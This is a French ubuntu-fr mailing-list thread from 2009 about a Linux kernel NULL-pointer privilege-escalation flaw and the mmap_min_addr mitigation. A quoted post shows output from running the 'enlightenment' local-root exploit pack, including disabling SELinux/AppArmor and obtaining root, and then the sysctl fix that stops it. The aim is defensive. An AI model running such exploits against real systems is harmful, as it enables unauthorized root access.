faille noyau linux
Michel ANDREU
michelan at orange.fr
Sam 7 Nov 09:36:04 UTC 2009
Sous LinuxMint Gloria (dernière version), il n'y a ni 0 ni une autre
valeur mais tout simplement rien.
N'étant pas pro à ce point, si quelqu'un peut me dire s'il y a une
faille ou non, ça m'arrangerait.
Andreu
jean a écrit :
> Bonsoir à tous,
>
>
> Je viens de lire un article sur linuxfr.org:
> http://www.linuxfr.org/2009/11/05/26120.html
> Cet article concerne une faille de sécurité sur le noyau permettant
> l'élévation de privilège d'un simple utilisateur.
>
> Je souhaite attirer votre attention sur cette partie plus spécialement
>
>
> /Pour se protéger (ou vérifier si votre système est vulnérable ou
> non), assurez-vous que la valeur de /proc/sys/vm/mmap_min_addr ne soit
> pas nulle. Debian Sid, Mandriva Linux 2010.0, Fedora 12, Ubuntu (Ibex
> et supérieurs) et les noyaux patchés avec grsecurity ne sont pas
> vulnérables./
>
> Cependant lorsque je vérifie sur mon système (Ubuntu 9.04 amd64):
>
> /jean at lehon:~$ cat /proc/sys/vm/mmap_min_addr /
> /0/
>
> Mon noyau est bien vulnérable contrairement aux dire de l'article. Une
> personne ayant répondu à l'article le remarque également
>
> /Le dépêche affirme que Ubuntu karmic n'est pas vulnérable. Or sur
> l'un de mes systèmes j'observe ceci:/
>
> /$ cat /proc/sys/vm/mmap_min_addr/
> /0/
>
> /et sur un autre l'observe ceci:/
>
> /$ cat /proc/sys/vm/mmap_min_addr/
> /65536/
>
> /Je ne sais pas encore d'où vient la différence, mais en tout cas,
> j'encourage tous les utilisateurs d'Ubuntu à vérifier eux mêmes. /
>
>
>
> De plus voici le résultat de l'exploit sur mon système:
>
> /jean at lehon:~/base_connaissance/exploit_linux/enlightenment$
> ./run_null_exploits.sh /
> /Compiling exp_cheddarbay.c...OK./
> /Compiling exp_ingom0wnar.c...OK./
> /Compiling exp_moosecox.c...OK./
> /Compiling exp_paokara.c...OK./
> /Compiling exp_powerglove.c...OK./
> /Compiling exp_therebel.c...OK./
> /Compiling exp_vmware.c...failed./
> /Compiling exp_wunderbar.c...OK./
> / [+] MAPPED ZERO PAGE!/
> /Choose your exploit:/
> / [0] Cheddar Bay: Linux 2.6.30/2.6.30.1 /dev/net/tun local root/
> / [1] MooseCox: Linux-2.X->Linux.2.6.31.unfixed pipe local root/
> / [2] Paokara: Linux 2.6.19->2.6.31.1 eCryptfs local root/
> / [3] Powerglove: Linux 2.6.31 perf_counter local root/
> / [4] The Rebel: Linux < 2.6.19 udp_sendmsg() local root/
> / [5] Wunderbar Emporium: Linux 2.X sendpage() local root/
> / [6] Exit/
> /> 1/
> /
> ------------------------------------------------------------------------------/
> / We forfeit three-quarters of ourselves in order to be like other
> people./
> / --Schopenhauer/
> /
> ------------------------------------------------------------------------------/
> / [+] Resolved selinux_enforcing to 0xffffffff80b51928/
> / [+] Resolved selinux_enabled to 0xffffffff80b51924/
> / [+] Resolved apparmor_enabled to 0xffffffff808c1aa4/
> / [+] Resolved apparmor_complain to 0xffffffff80b55044/
> / [+] Resolved apparmor_audit to 0xffffffff80b5504c/
> / [+] Resolved apparmor_logsyscall to 0xffffffff80b55050/
> / [+] Resolved security_ops to 0xffffffff80b4f0a8/
> / [+] Resolved default_security_ops to 0xffffffff808bfc00/
> / [+] Resolved sel_read_enforce to 0xffffffff803de1a0/
> / [+] Resolved audit_enabled to 0xffffffff80b0e5c4/
> / [+] Using newer pipe_inode_info layout/
> / [+] We'll let this go for a while if needed.../
> / [+] got ring0!/
> / [+] detected 2.6 style 8k stacks, with current at 0xffff88004c9f9660/
> / [+] Disabled security of : LSM/
> / [+] Got root!/
> /sh: gthumb: not found/
> /# /
>
>
> Après l'execution du script j'ai obtenu les droits root je suis
> parvenu à éditer des fichiers normalement non autorisés aux
> utilisateurs classiques.
>
> Après l'application du correctif de sécurité publié sur le site de
> Debian: http://wiki.debian.org/mmap_min_addr
>
> /jean at lehon:~/base_connaissance/exploit_linux/enlightenment$ sudo su/
> /root at lehon:/home/jean/base_connaissance/exploit_linux/enlightenment#
> echo "vm.mmap_min_addr = 4096" > /etc/sysctl.d/mmap_min_addr.conf/
> /root at lehon:/home/jean/base_connaissance/exploit_linux/enlightenment#
> /etc/init.d/procps restart/
> / * Setting kernel variables
> (/etc/sysctl.conf)... [ OK ] /
> / * Setting kernel variables
> (/etc/sysctl.d/10-console-messages.conf)... [ OK ] /
> / * Setting kernel variables
> (/etc/sysctl.d/10-network-security.conf)... [ OK ] /
> / * Setting kernel variables
> (/etc/sysctl.d/30-wine.conf)... [ OK ] /
> / * Setting kernel variables
> (/etc/sysctl.d/mmap_min_addr.conf)... [ OK ] /
> /root at lehon:/home/jean/base_connaissance/exploit_linux/enlightenment#
> exit/
> /exit/
> /jean at lehon:~/base_connaissance/exploit_linux/enlightenment$ cat
> /proc/sys/vm/mmap_min_addr /
> /4096/
> /jean at lehon:~/base_connaissance/exploit_linux/enlightenment$
> ./run_null_exploits.sh /
> /Compiling exp_cheddarbay.c...OK./
> /Compiling exp_ingom0wnar.c...OK./
> /Compiling exp_moosecox.c...OK./
> /Compiling exp_paokara.c...OK./
> /Compiling exp_powerglove.c...OK./
> /Compiling exp_therebel.c...OK./
> /Compiling exp_vmware.c...failed./
> /Compiling exp_wunderbar.c...OK./
> / [+] Personality set to: PER_SVR4/
> /I: caps.c: Limited capabilities successfully to CAP_SYS_NICE./
> /I: caps.c: Dropping root privileges./
> /I: caps.c: Limited capabilities successfully to CAP_SYS_NICE./
> /UNABLE TO MAP ZERO PAGE!/
> /jean at lehon:~/base_connaissance/exploit_linux/enlightenment$ /
>
>
> L'exploit ne fonctionne plus. Par contre comme l'indique l'article sur
> debian un petit nombre d'application peuvent ne plus fonctionner
> correctement.
>
>
> Je vous encourage à vérifier pour vos systèmes.
>
> Jean
>
>
>
> ---------------------------------------------------------------------------------------
> Orange vous informe que cet e-mail a été contrôlé par l'anti-virus mail.
> Aucun virus connu à ce jour par nos services n'a été détecté.
>
>
Plus d'informations sur la liste de diffusion ubuntu-fr